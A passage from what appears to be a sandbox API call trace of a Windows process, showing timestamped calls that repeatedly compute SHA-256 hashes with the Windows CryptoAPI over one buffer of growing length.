Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.666] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0187.666] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88d10 [0187.666] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e88d10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88d10, pdwDataLen=0xce51c) returned 1 [0187.666] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.666] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.666] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.666] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.666] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0187.666] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e883e0 [0187.666] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e883e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e883e0, pdwDataLen=0xce51c) returned 1 [0187.666] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.666] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.666] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.667] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.667] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0187.667] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88a10 [0187.667] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88a10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88a10, pdwDataLen=0xce51c) returned 1 [0187.667] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.667] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.667] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.668] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.668] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0187.668] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88650 [0187.668] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88650, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88650, pdwDataLen=0xce51c) returned 1 [0187.668] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.668] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.668] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.668] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.669] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0187.669] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88890 [0187.669] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e88890, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88890, pdwDataLen=0xce51c) returned 1 [0187.669] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.669] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.669] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.672] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.672] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0187.672] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88e60 [0187.672] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88e60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88e60, pdwDataLen=0xce51c) returned 1 [0187.672] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.672] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.672] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.673] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.673] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0187.673] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88680 [0187.673] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e88680, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88680, pdwDataLen=0xce51c) returned 1 [0187.673] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.673] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.673] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0187.673] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.673] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0187.673] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e886b0 [0187.673] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e886b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e886b0, pdwDataLen=0xce51c) returned 1 [0187.674] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.674] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0187.674] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.674] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.674] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0187.674] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e889b0 [0187.674] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e889b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e889b0, pdwDataLen=0xce51c) returned 1 [0187.674] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0187.674] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.674] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.675] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.675] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0187.675] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88710 [0187.675] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e88710, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88710, pdwDataLen=0xce51c) returned 1 [0187.675] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.675] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.675] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.675] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.675] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0187.675] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88aa0 [0187.676] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e88aa0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88aa0, pdwDataLen=0xce51c) returned 1 [0187.676] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.676] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.676] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.676] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.676] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0187.676] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88800 [0187.676] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88800, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88800, pdwDataLen=0xce51c) returned 1 [0187.676] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.676] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.676] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.677] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.677] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0187.677] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88c80 [0187.677] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e88c80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88c80, pdwDataLen=0xce51c) returned 1 [0187.677] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.677] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.677] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.678] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.678] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0187.678] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88d40 [0187.679] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e88d40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88d40, pdwDataLen=0xce51c) returned 1 [0187.679] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.679] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.679] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.679] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.679] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0187.679] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88b90 [0187.679] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e88b90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88b90, pdwDataLen=0xce51c) returned 1 [0187.679] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.679] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.679] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.680] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.680] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0187.680] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88950 [0187.680] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e88950, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88950, pdwDataLen=0xce51c) returned 1 [0187.680] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.680] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.680] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.681] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.681] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0187.681] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88d70 [0187.681] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e88d70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88d70, pdwDataLen=0xce51c) returned 1 [0187.681] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.681] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.681] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.681] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.681] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0187.681] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e882c0 [0187.681] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e882c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e882c0, pdwDataLen=0xce51c) returned 1 [0187.681] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.681] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.682] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.716] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.716] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0187.716] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88740 [0187.716] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88740, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88740, pdwDataLen=0xce51c) returned 1 [0187.716] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.716] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.716] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.717] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.717] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0187.717] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88c20 [0187.717] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88c20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88c20, pdwDataLen=0xce51c) returned 1 [0187.717] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.717] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.717] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.720] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.720] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0187.720] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88e30 [0187.720] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e88e30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88e30, pdwDataLen=0xce51c) returned 1 [0187.720] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.720] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.720] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.720] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.720] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0187.720] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88da0 [0187.720] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e88da0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88da0, pdwDataLen=0xce51c) returned 1 [0187.721] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.721] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.721] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.721] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.721] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0187.721] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88cb0 [0187.721] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e88cb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88cb0, pdwDataLen=0xce51c) returned 1 [0187.721] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.721] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.721] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0187.722] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.722] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0187.722] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e889e0 [0187.722] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e889e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e889e0, pdwDataLen=0xce51c) returned 1 [0187.722] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.722] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0187.722] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.723] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.723] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0187.723] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88830 [0187.723] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e88830, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88830, pdwDataLen=0xce51c) returned 1 [0187.723] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.723] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.723] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.723] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.723] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0187.723] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88a40 [0187.724] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e88a40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88a40, pdwDataLen=0xce51c) returned 1 [0187.724] CryptDestroyHash 